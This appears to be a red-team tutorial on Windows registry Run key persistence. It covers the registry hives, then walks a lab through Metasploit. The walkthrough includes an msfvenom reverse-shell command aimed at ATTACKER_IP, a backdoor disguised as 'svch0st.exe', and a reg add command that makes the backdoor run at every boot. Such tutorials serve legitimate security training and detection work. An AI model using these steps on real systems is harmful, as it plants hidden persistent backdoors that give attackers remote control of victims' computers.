Registry Run Key Persistence
Note: If you need to zoom in, you can click on the image.
What is a registry?
Registry is a hierarchical database that contains information about the Windows System and application. Show in the picture below.
Components
Hives
You can think of hives as a way to categorizes information. There are 5 hives.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
Contains information about the current log on user.
HKEY_LOCAL_MACHINE
Contains information about the computer system.
HKEY_USERS
HKEY_CURRRENT_CONFIG
What is a Run Key?
Run key is a registry that activate when a user log into the system. What we are going to do is create a key inside the Run key and point it to our backdoor/malware so that it activates every time a user log in.
The location of Run key is
Under HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Under HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Hands on
The following tool I’m going to use is just Metasploit and msfvenom. I already created an malicious payload to infect the host. The malicious payload is called svch0st.exe. What I’m going to do is setup a HTTP web server to distribute the malicious payload to the victim machine.
Next, we going to set up the listener and execute the malicious payload.
Here below, we can see that svch0st.exe (malicious payload) is running and we establish connection to the victim computer.
The next thing on the list is generating our backdoor using msfvenom. So, let open another shell.
To generate a payload, we're going to use the following command structure:
msfvenom -p payload LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f format > name.exe
Then, we're going to use meterpreter to upload the backdoor (evilLink.exe) to the victim machine. Don't forget to escape /.
Currently, we're inside svch0st.exe which is a 32-bit application. If we modify a registry of a 64-bit computer while we are in a 32-bit application, our changes will be added under:
HKEY_LOCAL_MACHINE\Software\Wow6432Node
The solution is to move to a 64-bit application and then modify the registry.
Now, we're going to open a command line inside the meterpreter using the command "shell" and add a value to the registry: (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run). This registry will execute the backdoor whenever the system boot up or reboot.
Structure of the command:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_SZ /d "C:\Windows\Temp\evilLink.exe" /f
Now that we added the value to the registry. Let's reboot the victim machine and see if our registry works.
While that is taking place, let's setup a listener on port 7777.
Boom, the victim machine automatically started the backdoor.